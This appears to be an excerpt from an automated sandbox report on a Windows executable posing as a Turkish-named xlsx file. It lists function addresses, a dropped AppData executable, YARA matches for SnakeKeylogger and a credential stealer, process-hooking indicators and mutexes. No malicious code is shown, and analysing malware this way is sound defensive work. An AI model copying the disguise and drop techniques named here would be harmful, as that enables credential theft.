Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B3448 10_2_071B3448
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B54B0 10_2_071B54B0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B4B00 10_2_071B4B00
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B2BE8 10_2_071B2BE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B8138 10_2_071B8138
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B0006 10_2_071B0006
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 10_2_071B3020 10_2_071B3020
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BC146 14_2_012BC146
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BA088 14_2_012BA088
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012B5362 14_2_012B5362
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BD278 14_2_012BD278
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BC468 14_2_012BC468
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BC738 14_2_012BC738
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012B69A0 14_2_012B69A0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BE988 14_2_012BE988
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BCA08 14_2_012BCA08
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012B3AA1 14_2_012B3AA1
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BCCD8 14_2_012BCCD8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BCFA9 14_2_012BCFA9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012B6FC8 14_2_012B6FC8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BF631 14_2_012BF631
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BE97B 14_2_012BE97B
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012B39EE 14_2_012B39EE
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012B29EC 14_2_012B29EC
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012BFA88 14_2_012BFA88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_012B3E09 14_2_012B3E09
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059261E8 14_2_059261E8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05922D9A 14_2_05922D9A
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05924D98 14_2_05924D98
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05924D89 14_2_05924D89
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05922DA8 14_2_05922DA8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05920DF0 14_2_05920DF0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05920DE0 14_2_05920DE0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05927508 14_2_05927508
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592EC90 14_2_0592EC90
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592D497 14_2_0592D497
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592EC81 14_2_0592EC81
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05922488 14_2_05922488
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592BCB2 14_2_0592BCB2
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592D4A8 14_2_0592D4A8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059204D0 14_2_059204D0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592A4D8 14_2_0592A4D8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592BCC0 14_2_0592BCC0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059204C0 14_2_059204C0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592A4C8 14_2_0592A4C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05928CF0 14_2_05928CF0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059274F8 14_2_059274F8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05928CE1 14_2_05928CE1
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05922477 14_2_05922477
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05924478 14_2_05924478
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05924467 14_2_05924467
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592E7BA 14_2_0592E7BA
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592CFD0 14_2_0592CFD0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05923FD8 14_2_05923FD8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592E7C8 14_2_0592E7C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05921FF8 14_2_05921FF8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592B7F8 14_2_0592B7F8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05929FFF 14_2_05929FFF
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592CFE0 14_2_0592CFE0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05923FE8 14_2_05923FE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05921FE8 14_2_05921FE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592B7E8 14_2_0592B7E8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05921710 14_2_05921710
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05921701 14_2_05921701
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05927E98 14_2_05927E98
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05929680 14_2_05929680
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05927E88 14_2_05927E88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059266B0 14_2_059266B0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059256B8 14_2_059256B8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059236B9 14_2_059236B9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059266A0 14_2_059266A0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059256A9 14_2_059256A9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059236C8 14_2_059236C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592F610 14_2_0592F610
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592DE38 14_2_0592DE38
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592F620 14_2_0592F620
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592DE28 14_2_0592DE28
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592C650 14_2_0592C650
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592AE58 14_2_0592AE58
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592C641 14_2_0592C641
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592AE68 14_2_0592AE68
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592966F 14_2_0592966F
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592C188 14_2_0592C188
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592A98F 14_2_0592A98F
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059291B8 14_2_059291B8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592A9A0 14_2_0592A9A0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059291A7 14_2_059291A7
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059279D0 14_2_059279D0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059261D9 14_2_059261D9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059279C0 14_2_059279C0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05922918 14_2_05922918
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592290A 14_2_0592290A
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05924908 14_2_05924908
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05920950 14_2_05920950
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592F158 14_2_0592F158
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592F147 14_2_0592F147
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592D970 14_2_0592D970
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592C178 14_2_0592C178
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05920960 14_2_05920960
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592D960 14_2_0592D960
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_059248F9 14_2_059248F9
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592A010 14_2_0592A010
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05928819 14_2_05928819
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05920006 14_2_05920006
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05928828 14_2_05928828
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592702F 14_2_0592702F
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05920040 14_2_05920040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05927040 14_2_05927040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592CB16 14_2_0592CB16
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592CB18 14_2_0592CB18
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592B31F 14_2_0592B31F
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592E300 14_2_0592E300
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592B330 14_2_0592B330
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05925B37 14_2_05925B37
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05929B38 14_2_05929B38
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05928350 14_2_05928350
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05923B58 14_2_05923B58
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05921B58 14_2_05921B58
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05925B48 14_2_05925B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05929B48 14_2_05929B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05923B48 14_2_05923B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05926B78 14_2_05926B78
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05928360 14_2_05928360
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05926B6A 14_2_05926B6A
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05921B68 14_2_05921B68
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05921280 14_2_05921280
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592FAD7 14_2_0592FAD7
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592FAE8 14_2_0592FAE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592E2EF 14_2_0592E2EF
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05925218 14_2_05925218
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05923238 14_2_05923238
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05923227 14_2_05923227
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_05925228 14_2_05925228
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 14_2_0592126F 14_2_0592126F
Sample file is different than original file name gathered from version info
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000000.1331444675.000000000109A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamevamE.exe8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1382075944.0000000007B80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowe vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1382075944.0000000007BE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevamE.exe8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1382768826.0000000007CF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.00000000045CF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1376138734.000000000165E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1377186980.0000000003341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3797023101.0000000000444000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3797646309.0000000000BA7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Binary or memory string: OriginalFilenamevamE.exe8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Uses 32bit PE files
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YzkHZRBcm.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs Security API names: _0020.AddAccessRule
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, FcY9ehqsfh4aVO4DAb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, FcY9ehqsfh4aVO4DAb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs Security API names: _0020.AddAccessRule
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs Security API names: _0020.AddAccessRule
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, FcY9ehqsfh4aVO4DAb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
